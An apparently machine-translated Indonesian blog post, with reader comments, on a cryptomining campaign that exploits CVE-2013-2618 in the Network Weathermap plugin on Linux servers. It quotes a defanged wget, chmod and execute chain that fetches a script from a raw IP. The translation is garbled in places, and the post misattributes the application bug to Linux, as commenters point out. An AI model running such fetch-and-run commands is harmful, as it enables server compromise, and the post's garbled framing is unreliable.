Ini dari penambang cryptocurrency dengan penggunaan komputer jarak jauh tanpa otorisasi dari pemilik ini sedang menjadi tren. Saya sudah membicarakan hal ini beberapa kali di blog tentang situasi seperti ini.
Dan ini sudah benar-benar di luar kendali sejak cryptocurrency telah mengambil tempat dan nilai yang cukup besarOrang-orang dengan pengetahuan yang memadai untuk mengakses komputer yang melanggar keamanan mereka telah membuang-buang waktu untuk mencari informasi penting atau rekening bank untuk mendapatkan keuntungan moneter.
Alih-alih melakukan ini, mereka memilih hal yang paling sederhana dalam mengendalikan tim ini dan menyatukan mereka dalam jaringan penambangan dan juga untuk tugas-tugas lain yang biasa mereka lakukan dengan botnet.
Dengan cara ini biasanya lebih banyak menomori Anda kembali, mereka hanya berfokus pada uang instan yang dihasilkannya.
Dengan pemahaman cerdas tentang tren pasar dan pengetahuan yang tepat tentang perdagangan kripto, seseorang dapat memperoleh keuntungan besar.
Apakah Linux benar-benar sistem yang aman?
Banyak dari kita memiliki gagasan bahwa Linux adalah sistem operasi aman yang hampir sempurna, kenyataannya masih memiliki beberapa kekurangan.
Memilikibeberapa hari TrendMicro menemukan sesuatu, di mana mengungkapkan baru cacat dalam sistem Linux yang memberi peretas keuntungan dari menambang cryptocurrency menggunakan server dan mesin Linux.
Dalam pernyataan melalui blog Anda mereka berkomentar berikut ini:
Melalui pemantauan kami terkait dengan respons insiden, kami mengamati upaya intrusi yang indikatornya dapat kami hubungkan dengan kampanye penambangan cryptocurrency sebelumnya yang menggunakan malware JenkinsMiner.
Perbedaannya: kampanye ini menargetkan server Linux. Ini juga merupakan kasus klasik kerentanan yang digunakan kembali, mengeksploitasi kelemahan keamanan lama yang tambalannya telah tersedia selama hampir lima tahun.
Dalam rilis ini melalui analisis Anda berhasil mengidentifikasi situs yang terpengaruh untuk kegagalan ini itu itu terutama mempengaruhi Jepang, Taiwan, Cina, Amerika Serikat dan India.
Analisis serangan
Melalui analisis oleh Trend Micro Smart Protection Network menjelaskan sedikit tentang bagaimana penyerang memanfaatkan kelemahan ini:
Operator kampanye ini mengeksploitasi CVE-2013-2618, kerentanan tertanggal di plugin Camapi Network Weathermap, yang digunakan administrator sistem untuk memvisualisasikan aktivitas jaringan.
Adapun mengapa mereka mengeksploitasi kelemahan keamanan lama: Network Weathermap sejauh ini hanya memiliki dua kerentanan yang dilaporkan secara publik, keduanya dari Juni 2014.
Penyerang ini mungkin mengambil keuntungan tidak hanya dari kelemahan keamanan yang mana exploit tersedia tetapi juga penundaan patch yang terjadi dalam organisasi yang menggunakan alat open source.
Pada dasarnya serangannya melalui serangan XSS:
Bagian fuzzy adalah target serangan, server web dengan port.
file /plugins/weathermap/configs/conn.php adalah file yang dihasilkan dari serangan XSS yang terus-menerus di / plugins / peta cuaca / php .
Selain samb.php Awalnya, kami melihat permintaan HTTP serupa diterapkan ke halaman bernama ' keren.php '.
Program penambangan cryptocurrency didistribusikan melalui kerentanan dari peta cuaca PHP pada target server Linux
Pada gambar Anda dapat melihat bagaimana serangan itu dihasilkan dan dijelaskan sebagai berikut:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Apa yang dilakukannya adalah mengirimkan indikasi untuk mengunduh file dengan wget, yang merupakan utilitas yang diinstal oleh hampir semua distribusi Linux secara default.
chmod 775 watchd0g.sh
membuat file dapat dieksekusi
./watchd0g.sh
Apa yang akhirnya dilakukannya adalah menjalankan file di server.
Untunglah sudah ada tambalan ( CVE-2013-2618 ) tersedia untuk kegagalan dan Anda bisa mendownloadnya dari tautan ini
Si Anda ingin tahu lebih banyak tentang itu dari kegagalan ini, Anda dapat mengunjungi tautan ini.
sumber: Cryptocurrency Miner Didistribusikan melalui Kerentanan Peta Cuaca PHP, Menargetkan Server Linux
Menjadi idiot tidaklah aman, dan meskipun demikian Linux menyelamatkan Anda.
Tidak memperbarui tambalan keamanan bukanlah kesalahan Linux. Ini adalah kesalahan beberapa perusahaan, untuk menghemat uang, mempekerjakan orang bodoh sebagai administrator sistem,
Namun meski begitu, ini DIDETEKSI SEGERA dan segera diselesaikan, bahkan insiden keamanan kecil seperti ini dipublikasikan.
Dan kesalahan apa yang dimiliki Linux sehingga pembaruannya tidak diterapkan? Pengembang GNU / Linux memenuhi misi mereka dengan mengembangkan solusi untuk kerentanan yang muncul dan membuatnya tersedia untuk pengguna. Jika dokter meresepkan vaksin flu dan Anda tidak mendapatkannya, Anda menjadi sakit dan kaku… apakah ini kesalahan dokter?
DesdeLinux no es lo que era, dos noticias seguidas con dos fallos importantes:
1.- Dalam pengembangan editor yang lebih baik, mereka meletakkan satu perangkat lunak yang bukan perangkat lunak bebas dan mereka melupakan yang lain (mereka dikutip di komentar).
2.- Berita luar biasa tentang virus ketika mereka hanya memengaruhi server yang TIDAK DIPERBARUI. Tetapi jika ada linux yang telah diperbarui secara default selama beberapa dekade. Untuk menempatkan rasa takut seolah-olah diperlukan antivirus penghisap gaya Windows. Mereka sepertinya mencoba untuk mengatakan bahwa Linux itu sama dengan Windows dan tidak.
Jika bug sudah lama dan sudah ditambal, itu bukan berita atau bukan apa-apa. Jangan bermain-main dengan Microsoft dan perusahaan antivirus seperti Trend Micro, Norton, Panda atau McAffee, atau dibayar.
Ngomong-ngomong, kami menggunakan Trend Micro selama beberapa tahun di perusahaan dan itu benar-benar kentang, omong kosong, karena sistemnya mengatakan bahwa file yang dapat dieksekusi memiliki "jejak" virus (sesuatu yang bisa menjadi virus, bahkan jika itu tidak) dan mengapa itu menghapusnya (itu membawanya ke direktori sehingga tidak akan berjalan) tidak mengizinkan penggunaannya, dan tidak memiliki daftar putih apa pun untuk membuka blokir perilaku ini dengan file eksekusi yang aman yang perlu kami gunakan . Berantakan sekali. Itu adalah versi korporat, versi individual memang memiliki kemungkinan untuk dimasukkan ke daftar putih. Menyedihkan.
Jangan mendeskripsikan diri Anda dengan begitu elegan.
Artikel ini membahas tentang lubang keamanan yang memungkinkan Anda untuk memasuki suatu program, membuatnya dapat dieksekusi dan menjalankannya, yang merupakan lubang keamanan yang dibutuhkan setiap virus untuk disebarkan, jelas untuk menjadi virus, program yang dimasukkan harus memiliki kodenya kemungkinan memindai komputer di jaringan untuk mengulangi operasi dan menyalin sendiri. Mereka tidak benar-benar melakukan ini karena di Linux lubang keamanan yang ditemukan ditutupi oleh patch keamanan, dan itulah yang saya maksud dengan perbedaan antara Windows dan Linux, karena antivirus tidak diperlukan, tetapi untuk menutupi lubang tersebut. Di Windows, hal ini lebih sulit karena beberapa alasan: 1.- File dapat dieksekusi hanya dengan ekstensinya, menghilangkan satu langkah untuk pengenalannya di komputer yang terpengaruh. 2.- Pengguna terus-menerus menginstal program yang asal-usulnya meragukan karena mereka adalah hak milik dan perlu memilikinya tanpa membayar (Saya tidak mengatakan apa-apa bagi ekonomi rumahan untuk membeli MS Office, Photoshop, ... lebih dari dua kali lipat biaya peralatan komputer). 3.- Cepat atau lambat Windows akan memudar, pengguna membawanya ke tetangga, teman, ... yang, agar tidak membuang waktu, memformat semuanya dan menginstal Windows ultimate dengan tambalan aktivasi yang tidak diperbarui atau itu tambalan itu sendiri menempatkan program mata-mata. Bisa jadi tidak dan itu bagus, tetapi bisa jadi itu dan memiliki Windows yang memata-matai kata sandinya. Dalam artikel tersebut mereka menyebutkan pengenalan sistem di linux yang dipengaruhi oleh kerentanan, membuat program yang secara otomatis memindai jaringan dan menggunakannya untuk menyalin dirinya sendiri dan berjalan di server adalah bagian yang paling mudah dari semuanya, untuk alasan itu apa yang telah dikatakan di artikel ini adalah langkah terpenting untuk virus apa pun: mengetahui kerentanan sistem untuk menyerang.
Informasi buruk. Ini bukan bug di Linux, ini adalah bug dalam APLIKASI PHP, yaitu multiplatform. Ini bahkan tidak eksklusif untuk sistem yang menjalankan kernel linux! Tetapi bahkan jika aplikasinya tidak lintas platform, itu bukan bug Linux, itu hanya sebuah aplikasi.
Kernel Linux tidak memiliki gangguan sedikit pun dalam melindungi dari serangan skrip lintas situs seperti ini. Setidaknya selidiki LIMA MENIT sebelum memposting karena kebenaran bahwa bagi siapa pun yang tahu sedikit tentang sesuatu, Anda akan terlihat buruk.